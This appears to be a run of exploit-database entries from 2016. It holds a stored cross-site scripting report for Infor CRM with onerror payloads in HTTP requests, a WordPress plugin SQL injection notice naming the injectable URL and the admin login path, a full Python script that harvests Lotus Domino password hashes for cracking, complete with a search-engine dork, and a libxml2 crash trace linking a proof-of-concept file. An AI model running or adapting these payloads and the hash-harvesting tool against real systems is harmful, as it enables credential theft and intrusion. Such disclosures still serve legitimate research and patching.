PUT /SLXClient/slxdata.ashx/slx/system/-/attachments(%22eUSERA0004IX%22)?_includeFile=false&format=json&_t=1456358980947 HTTP/1.1
Host: intranet.zeroscience.mk
{$updated: "/Date(1456359095000)/", $key: "eUSERA0004IX",…}
"": ""
$descriptor: ""
$etag: "+CgjMLB+0nA="
$httpStatus: 200
$key: "eUSERA0004IX"
$lookup: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
$post: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
$schema: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$schema?format=json"
$service: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$service?format=json"
$template: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$template?format=json"
$updated: "/Date(1456359095000)/"
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments('eUSERA0004IX')"
accountId: null
activityId: null
attachDate: "2016-01-25T00:09:39Z"
contactId: null
contractId: null
createDate: "/Date(1456359095000)/"
createUser: "UUSERA0005W0"
dataType: "R"
defectId: null
description: "<img src=j onerror=confirm(document.cookie) >"
details: {createSource: null}
documentType: null
fileExists: true
fileName: "inforcrm_xss.png"
fileSize: 101722
historyId: null
leadId: null
modifyDate: "/Date(1456359095000)/"
modifyUser: "UUSERA0005W0"
opportunityId: null
physicalFileName: "!eUSERA0004IXinforcrm_xss.png"
productId: null
remoteStatus: null
returnId: null
salesOrderId: null
ticketId: null
url: null
user: {$key: "UUSERA0005W0"}
-----------------------------------------------------------
Affected parameter(s): Description, Location, and LongNotes
-----------------------------------------------------------
POST /SLXClient/slxdata.ashx/slx/system/-/activities?format=json&_t=1456357736977 HTTP/1.1
Host: intranet.zeroscience.mk
{$httpStatus: 200, $descriptor: "", ActivityBasedOn: null, Alarm: false,…}
$descriptor: ""
$httpStatus: 200
AccountId: null
AccountName: null
ActivityAttendees: {}
ActivityBasedOn: null
Alarm: false
AlarmTime: "2016-01-24T22:45:00Z"
AllowAdd: true
AllowComplete: true
AllowDelete: true
AllowEdit: true
AllowSync: true
AppId: null
Attachment: false
AttachmentCount: null
AttendeeCount: 0
Category: "Pleasantville"
ContactId: null
ContactName: null
CreateDate: "/Date(-62135596800000)/"
CreateUser: null
Description: "<img src=zsl onerror=prompt(1) >"
Details: {ForeignId1: null, ForeignId2: null, ForeignId3: null, ForeignId4: null, ProjectId: null,…}
ChangeKey: null
CreateSource: null
ForeignId1: null
ForeignId2: null
ForeignId3: null
ForeignId4: null
GlobalSyncId: null
ProjectId: null
Tick: null
UserDef1: null
UserDef2: null
UserDef3: null
Duration: "0"
EndDate: "/Date(1456359315286)/"
LeadId: null
LeadName: null
Leader: {$key: "UUSERA0005W0", $descriptor: "Userovich, User"}
$descriptor: "Userovich, User"
$key: "UUSERA0005W0"
Location: "<img src=zsl onerror=prompt(2) >"
LongNotes: "<img src=zsl onerror=prompt(3) >"
ModifyDate: "/Date(-62135596800000)/"
ModifyUser: null
Notes: "Zero Science Lab"
OpportunityId: null
OpportunityName: null
OriginalDate: "/Date(1456358415286)/"
PhoneNumber: null
Priority: "1"
ProcessId: null
ProcessNode: null
RecurIterations: 0
RecurPeriod: 0
RecurPeriodSpec: 0
RecurSkip: null
RecurrenceState: "rsNotRecurring"
Recurring: false
Resources: {}
Rollover: false
StartDate: "2016-01-25T00:00:05Z"
TicketId: null
TicketNumber: null
Timeless: true
Type: "atToDo"
UserActivities: {}
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"
UserNotifications: {}
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"
========
Ocim MP3 Plugin SQL Injection Vulnerability
========
:----------------------------------------------------------------------------------------------------:
: # Exploit Title : Ocim MP3 Plugin SQL Injection Vulnerability
: # Date : 26 February 2016
: # Author : xevil and Blankon33
: # Vendor Site: http://www.ocimscripts.com/
: # Version:
: # Vulnerability : SQL Injection
: # Tested on : Wordpress 4.4.2
: # Severity : High
:----------------------------------------------------------------------------------------------------:
Summary
========
Ocim MP3 is Plugin to make MP3 Grabber site based on Wordpress.
Proof of Concept
========
Infected URL:
http://[Site]/[Path]/wp-content/plugins/ocim-mp3/source/pages.php?id=['SQLi]
Admin Panel:
http://[Site]/[Path]/oc-login.php
===========
Thanks to
===========
All Indonesian Hacker!!!
# Exploit Title: IBM Lotus Domino <= R8 Password Hash Extraction Exploit
# Google Dork: inurl:names.nsf?opendatabase
# Date: 02-24-2016
# Exploit Author: Jonathan Broche
# Contact: https://twitter.com/g0jhonny
# Vendor Homepage: https://www-01.ibm.com/software/lotus/category/messaging/
# Tested on: Lotus Domino 8.5
# CVE : CVE-2005-2428
1. Description
IBM Domino Databases contain a configuration issue allowing users to obtain password hashes, configuraiton information and more from the Public Address Book (i.e., names.nsf database). Password hashes are obtained from the hidden HTML HTTPPassword and dspHTTPPassword fields per user in the database.
2. Proof of Concept
#!/usr/bin/env python2
import requests, re, BeautifulSoup, sys, argparse, os
requests.packages.urllib3.disable_warnings()
parser = argparse.ArgumentParser(description='Domino Effect - A Lotus Domino password hash tool by Jonathan Broche (@g0jhonny)', version="1.0")
parser.add_argument('system', help="IP address or hostname to harvest hashes from. ")
parser.add_argument('-u', '--uri', metavar='path', default="/names.nsf", help="Path to the names.nsf file. [Default: /names.nsf]")
outgroup = parser.add_argument_group(title="Output Options")
outgroup.add_argument('--hashcat', action='store_true', help="Print results for use with hashcat.")
outgroup.add_argument('--john', action='store_true', help="Print results for use with John the Ripper.")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
print "\nDomino Effect {}\n".format(parser.version)
headers={'User-Agent':'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3'}
try:
response = requests.get("https://{}{}/People?OpenView".format(args.system, args.uri), verify=False, headers=headers, timeout=3)
except requests.exceptions.Timeout as e:
print "[!] Timed out, try again."
sys.exit(1)
except Exception as e:
print e
soup = BeautifulSoup.BeautifulSoup(response.text)
links = []
#grab all user profile links
for link in soup.findAll('a'):
if "OpenDocument" in link['href']:
if link['href'] not in links:
links.append(link['href'])
hashes = {}
for link in links: #get user profile
try:
response = requests.get("https://{}{}".format(args.system, link), verify=False, headers=headers, timeout=2)
except requests.exceptions.Timeout as e:
pass
except Exception as e:
print e
if response.text:
soup = BeautifulSoup.BeautifulSoup(response.text)
name = soup.find('input', {'name' : '$dspShortName'}).get('value').strip() #short name
httppassword = soup.find('input', { "name" : "HTTPPassword"}).get('value').strip()
dsphttppassword = soup.find('input', { "name" : "dspHTTPPassword"}).get('value').strip()
if httppassword and httppassword not in hashes.keys():
hashes[httppassword] = name
elif dsphttppassword and dsphttppassword not in hashes.keys():
hashes[dsphttppassword] = name
if hashes: #output
if args.hashcat or args.john:
if args.hashcat:
for h in hashes.keys():
print h
if args.john:
for h, n in hashes.items():
print "{}:{}".format(n,h)
else:
for h, n in hashes.items():
print "[*] User: {} Hash: {}".format(n, h)
print "\n{} hashes obtained\n".format(len(hashes))
3. Solution
To hide the HTTP password from the HTML source:
1) Open the $PersonalInheritableSchema subform (In the designer under Shared Code, Subforms).
2) Find the fields: $dspHTTPPassword and HTTPPassword.
3) In the field properties for both fields, on the hide tab under "Hide paragram from" check off "Web browsers".
4) Open the Person form (Under Forms).
5) In the form properties, on the 2nd tab, disable the option "Generate HTML for all fields".
In addition, ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other senstive files.
Source: https://code.google.com/p/google-security-research/issues/detail?id=636
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint --html /path/to/file"):
--- cut ---
==26202==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100001c900 at pc 0x0000008073f9 bp 0x7ffd791c7f90 sp 0x7ffd791c7f88
READ of size 1 at 0x62100001c900 thread T0
#0 0x8073f8 in htmlCurrentChar libxml2-2.9.3/HTMLparser.c:439:6
#1 0x80ee62 in htmlParseCharDataInternal libxml2-2.9.3/HTMLparser.c:3011:8
#2 0x821b85 in htmlParseCharData libxml2-2.9.3/HTMLparser.c:3061:5
#3 0x7df875 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4634:3
#4 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#5 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#6 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#7 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#8 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x62100001c900 is located 0 bytes to the right of 4096-byte region [0x62100001b900,0x62100001c900)
allocated by thread T0 here:
#0 0x4b8b68 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0xa01a0c in xmlBufCreate libxml2-2.9.3/buf.c:137:32
#2 0x550aca in xmlSwitchInputEncodingInt libxml2-2.9.3/parserInternals.c:1205:34
#3 0x54f5ce in xmlSwitchToEncodingInt libxml2-2.9.3/parserInternals.c:1281:12
#4 0x54f278 in xmlSwitchEncoding libxml2-2.9.3/parserInternals.c:1101:11
#5 0x808eea in htmlCurrentChar libxml2-2.9.3/HTMLparser.c:518:13
#6 0x804a38 in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2496:9
#7 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
#8 0x7ec211 in htmlParseDocTypeDecl libxml2-2.9.3/HTMLparser.c:3424:12
#9 0x7debf4 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4585:3
#10 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#11 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#12 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#13 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#14 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/HTMLparser.c:439:6 in htmlCurrentChar
Shadow bytes around the buggy address:
0x0c427fffb8d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb8f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffb910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c427fffb920:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffb970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==26202==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758606. Attached is an XML file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39494.zip